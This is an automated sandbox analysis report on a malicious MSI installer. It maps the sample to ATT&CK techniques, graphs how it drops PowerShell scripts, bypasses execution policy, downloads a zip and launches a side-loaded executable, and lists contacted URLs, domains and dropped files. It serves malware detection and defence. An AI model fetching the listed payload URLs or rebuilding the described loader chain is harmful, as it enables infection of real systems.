                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FF60BD71954 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FF60BD71954
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Replication Through Removable Media
                  1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  21
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory121
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)11
                  Process Injection
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS21
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing
                  Cached Domain Credentials11
                  Peripheral Device Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync2
                  File and Directory Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  File Deletion
                  Proc Filesystem24
                  System Information Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471217 Sample: 2024.0198840 298135.msi Startdate: 11/07/2024 Architecture: WINDOWS Score: 88 57 public.adobecc.map.fastly.net 2->57 59 public.adobecc.com 2->59 65 Multi AV Scanner detection for dropped file 2->65 67 Yara detected Powershell download and execute 2->67 69 Yara detected MalDoc 2->69 71 4 other signatures 2->71 11 msiexec.exe 22 49 2->11         started        14 msiexec.exe 2 2->14         started        signatures3 process4 file5 49 C:\Users\user\...\WebExperienceHostApp.exe, PE32+ 11->49 dropped 51 C:\Windows\Installer\MSIE83E.tmp, data 11->51 dropped 53 C:\Windows\Installer\53e56a.msi, Composite 11->53 dropped 55 14 other files (1 malicious) 11->55 dropped 16 msiexec.exe 9 11->16         started        process6 file7 35 C:\Users\user\AppData\Local\...\scrEDC8.ps1, Unicode 16->35 dropped 37 C:\Users\user\AppData\Local\...\pssEDDB.ps1, Unicode 16->37 dropped 63 Bypasses PowerShell execution policy 16->63 20 powershell.exe 17 20 16->20         started        signatures8 process9 dnsIp10 61 public.adobecc.map.fastly.net 151.101.129.138, 443, 49730 FASTLYUS United States 20->61 39 C:\Users\user\AppData\Local\...\10072024.zip, data 20->39 dropped 73 Writes many files with high entropy 20->73 25 WebExperienceHostApp.exe 147 20->25         started        29 conhost.exe 20->29         started        file11 signatures12 process13 file14 41 C:\...\external_extensions_0000x.50, COM 25->41 dropped 43 C:\...\external_extensions_0000x.14, DOS 25->43 dropped 45 C:\...\external_extensions_0000x.99, data 25->45 dropped 47 134 other files (130 malicious) 25->47 dropped 75 Writes many files with high entropy 25->75 31 chrome.exe 25->31         started        signatures15 process16 process17 33 WerFault.exe 19 16 31->33         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  2024.0198840 298135.msi5%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.140%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.140%VirustotalBrowse
                  C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.500%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.500%VirustotalBrowse
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe0%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe0%VirustotalBrowse
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll8%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll7%VirustotalBrowse
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe0%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe0%VirustotalBrowse
                  C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll0%ReversingLabs
                  C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\mrt100_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\mrt100_app.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\msvcp140_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\msvcp140_app.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcamp140_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcamp140_app.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vccorlib140_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vccorlib140_app.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcomp140_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcomp140_app.dll0%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_1_app.dll9%VirustotalBrowse
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_app.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_app.dll0%VirustotalBrowse
                  C:\Windows\Installer\MSIE6C2.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIE6C2.tmp1%VirustotalBrowse
                  C:\Windows\Installer\MSIE740.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIE740.tmp1%VirustotalBrowse
                  C:\Windows\Installer\MSIE770.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIE770.tmp1%VirustotalBrowse
                  C:\Windows\Installer\MSIE790.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIE790.tmp1%VirustotalBrowse
                  C:\Windows\Installer\MSIE7DF.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIE7DF.tmp1%VirustotalBrowse
                  C:\Windows\Installer\MSIED31.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIED31.tmp0%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  public.adobecc.com0%VirustotalBrowse
                  public.adobecc.map.fastly.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://crl.microsoft0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore6lB0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://crashpad.chromium.org/0%Avira URL Cloudsafe
                  http://public.adobecc.com0%Avira URL Cloudsafe
                  https://public.adobeccD~0%Avira URL Cloudsafe
                  https://public.adobecc.com/files/1CRUSWG253MBK5OSUBRDH4V033RFFF0%Avira URL Cloudsafe
                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf0%Avira URL Cloudsafe
                  https://crashpad.chromium.org/bug/new0%Avira URL Cloudsafe
                  https://public.adobecc.com/files/1CRUSWG253MBK5OSUBRDH4V033RFFF0%VirustotalBrowse
                  http://www.movable-type.co.uk/scripts/xxtea.pdf0%Avira URL Cloudsafe
                  http://public.adobecc.com0%VirustotalBrowse
                  http://tools.ietf.org/html/rfc13210%Avira URL Cloudsafe
                  https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal0%Avira URL Cloudsafe
                  https://crashpad.chromium.org/0%VirustotalBrowse
                  http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf0%Avira URL Cloudsafe
                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf0%VirustotalBrowse
                  http://www.movable-type.co.uk/scripts/xxtea.pdf0%VirustotalBrowse
                  https://crashpad.chromium.org/bug/new0%VirustotalBrowse
                  https://public.adobecc.com0%Avira URL Cloudsafe
                  http://tools.ietf.org/html/rfc13210%VirustotalBrowse
                  http://www.schneier.com/paper-twofish-paper.pdf0%Avira URL Cloudsafe
                  https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal2%VirustotalBrowse
                  https://public.adobeccD0%Avira URL Cloudsafe
                  http://www.ietf.org/rfc/rfc3447.txt0%Avira URL Cloudsafe
                  https://public.a(f0%Avira URL Cloudsafe
                  https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%Avira URL Cloudsafe
                  http://www.schneier.com/paper-blowfish-fse.html0%Avira URL Cloudsafe
                  http://www.ietf.org/rfc/rfc3447.txt0%VirustotalBrowse
                  http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf0%VirustotalBrowse
                  https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%VirustotalBrowse
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  http://www.itl.nist.gov/fipspubs/fip180-1.htm0%Avira URL Cloudsafe
                  http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf0%Avira URL Cloudsafe
                  https://public.adobecc.com0%VirustotalBrowse
                  http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf0%Avira URL Cloudsafe
                  https://public.adobecc.com/public/files/1CRUSWG253MBK5OSUBRDH4V033RFFF0%Avira URL Cloudsafe
                  http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf0%Avira URL Cloudsafe
                  http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf0%VirustotalBrowse
                  http://www.schneier.com/paper-blowfish-fse.html0%VirustotalBrowse
                  https://public.adobecc.com/public/files/1CRUSWG253MBK5OSUBRDH4V033RFFF0%VirustotalBrowse
                  http://tools.ietf.org/html/rfc46480%Avira URL Cloudsafe
                  https://public.a0%Avira URL Cloudsafe
                  http://www.schneier.com/paper-twofish-paper.pdf0%VirustotalBrowse
                  http://public.adobecc.map.fastly.net0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  http://www.itl.nist.gov/fipspubs/fip180-1.htm0%VirustotalBrowse
                  http://public.adobecc.map.fastly.net0%VirustotalBrowse
                  http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf0%VirustotalBrowse
                  http://tools.ietf.org/html/rfc46480%VirustotalBrowse
                  http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  public.adobecc.map.fastly.net
                  151.101.129.138
                  truefalseunknown
                  public.adobecc.com
                  unknown
                  unknownfalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://public.adobecc.com/files/1CRUSWG253MBK5OSUBRDH4V033RFFFfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://crashpad.chromium.org/WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://public.adobeccD~powershell.exe, 00000003.00000002.1836238055.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.microsoftpowershell.exe, 00000003.00000002.1842771610.0000000007653000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://public.adobecc.compowershell.exe, 00000003.00000002.1836238055.00000000054C5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://go.micropowershell.exe, 00000003.00000002.1836238055.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://crashpad.chromium.org/bug/newWebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.movable-type.co.uk/scripts/xxtea.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tools.ietf.org/html/rfc1321chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensalWebExperienceHostApp.exe, 00000006.00000002.1880145671.00000000662BD000.00000002.00000001.01000000.00000009.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1880808127.000001840D26B000.00000004.00001000.00020000.00000000.sdmp, vcruntime140_1_app.dll.1.drfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.schneier.com/paper-twofish-paper.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://public.adobecc.compowershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://public.adobeccDpowershell.exe, 00000003.00000002.1836238055.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.ietf.org/rfc/rfc3447.txtchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://public.a(fpowershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newWebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.schneier.com/paper-blowfish-fse.htmlchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.itl.nist.gov/fipspubs/fip180-1.htmchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://public.adobecc.com/public/files/1CRUSWG253MBK5OSUBRDH4V033RFFFpowershell.exe, 00000003.00000002.1836238055.00000000054E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836238055.00000000050A3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfchrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1836238055.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tools.ietf.org/html/rfc4648chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://public.apowershell.exe, 00000003.00000002.1836238055.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://public.adobecc.map.fastly.netpowershell.exe, 00000003.00000002.1836238055.00000000054C5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1836238055.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  151.101.129.138
                  public.adobecc.map.fastly.netUnited States
                  54113FASTLYUSfalse
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1471217
                  Start date and time:2024-07-11 03:55:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:2024.0198840 298135.msi
                  Detection:MAL
                  Classification:mal88.rans.troj.evad.winMSI@12/187@1/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 29
                  • Number of non-executed functions: 220
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.42.73.29
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target chrome.exe, PID 7480 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 7128 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  21:56:00API Interceptor46x Sleep call for process: powershell.exe modified
                  21:56:33API Interceptor1x Sleep call for process: WerFault.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  151.101.129.138https://acrobat.adobe.com/id/urn:aaid:sc:AP:b9316e7e-dc47-46fc-b707-c59033d784c1Get hashmaliciousHTMLPhisherBrowse
                    https://acrobat.adobe.com/id/urn:aaid:sc:EU:ef0d789e-0669-4783-b899-4f88ab08c8cbGet hashmaliciousUnknownBrowse
                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:be94af7a-734f-4324-8160-e952ef419173Get hashmaliciousUnknownBrowse
                        https://acrobat.adobe.com/id/urn:aaid:sc:va6c2:cd3ebb90-8ea6-4b78-964c-b0e0e1aff30aGet hashmaliciousUnknownBrowse
                          https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:481a2144-6b97-4a28-8378-18fcc2676996Get hashmaliciousUnknownBrowse
                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:9c7c4348-dae0-4421-9d5d-e19308444bf9Get hashmaliciousUnknownBrowse
                              Oferta 10935.emlGet hashmaliciousUnknownBrowse
                                https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:5cf29cc6-c8c7-4d51-86cc-ac3ccd2559a8?viewer%21megaVerb=group-discoverymrwiIdcOhFrFaB.pdfGet hashmaliciousUnknownBrowse
                                  https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImppbGwub2tlZWZmZUBhdGxhbnRpY2FyZS5vcmciLCJyZXF1ZXN0SWQiOiJhN2FlZTBmNS0xZDFkLTQxOTgtN2MwYi1jMGFhYzUwNmNhNTIiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjozNzE0ZjAzZC04Mzc4LTQ5OWMtOTg4Zi0yYjExMDc3ZmNkOGEiLCJsYWJlbCI6IjEyIiwibG9jYWxlIjoiZW5fVVMifQ.cHka_UyRufdl2FWExn4qK06yf5bY5SzHk_Dl30luv6TNezuMfluGHXeuU150Kj9T8ZluD7HZilv5699deMPC-gGet hashmaliciousUnknownBrowse
